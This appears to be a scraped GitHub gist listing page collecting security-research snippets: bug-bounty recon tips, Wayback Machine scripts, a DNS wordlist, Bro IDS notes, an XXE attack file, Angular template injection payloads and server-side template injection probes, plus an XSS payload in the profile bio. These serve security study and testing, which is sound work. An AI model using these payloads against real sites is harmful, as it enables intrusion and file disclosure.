Skip to content

Instantly share code, notes, and snippets.

View pnigos's full-sized avatar
:octocat:
http://g.com/#'"/onmouseover="prompt(1)"/x=

pnig0s pnigos

:octocat:
http://g.com/#'"/onmouseover="prompt(1)"/x=
201 followers · 22 following
View GitHub Profile
@EdOverflow
EdOverflow / broken_link_hijacking.md
Last active May 30, 2023 18:31
This post aims to give you a basic overview of the different issues that could possibly arise if a target links to an expired endpoint.
@EdOverflow
EdOverflow / github_bugbountyhunting.md
Last active July 15, 2025 12:45
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@jobertabma
jobertabma / attack.xml
Created June 13, 2017 17:39 — forked from janmartenjongerius/attack.xml
XXE attack using PHP
<!DOCTYPE scan [
<!ENTITY test SYSTEM "target.xml">
]><scan>&test;</scan>
@FrankSpierings
FrankSpierings / README.md
Last active February 20, 2025 10:48
Linux Container Escapes and Hardening
@jhaddix
jhaddix / all.txt
Last active July 14, 2025 21:15
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@mhmdiaa
mhmdiaa / waybackurls.py
Last active July 16, 2025 01:02
import requests
import sys
import json
def waybackurls(host, with_subs):
if with_subs:
url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
else:
url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
@mhmdiaa
mhmdiaa / waybackrobots.py
Last active July 3, 2025 11:00
import requests
import re
import sys
from multiprocessing.dummy import Pool
def robots(host):
r = requests.get(
'https://web.archive.org/cdx/search/cdx\
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)
@mccabe615
mccabe615 / AngularTI.md
Last active April 9, 2025 02:27
Angular Template Injection Payloads

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
@PSJoshi
PSJoshi / bro-notes.txt
Last active September 29, 2023 08:09
Bro-IDS
----------------------
NIC settings
----------------------
#turn off rx checksumming
ethtool -K eth1 rx off
# off tx checksumming
ethtool -K eth1 tx off
#turn off scatter-gather
@Yas3r
Yas3r / Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger).md
Created December 10, 2015 16:29 
> Dear ${user.first_name},
Dear sample01

> Dear ${user.password}
FreeMarket template error: the following has evaluated to null or missing...

Q: Is it safe to allow users to upload templates if they are untrusted?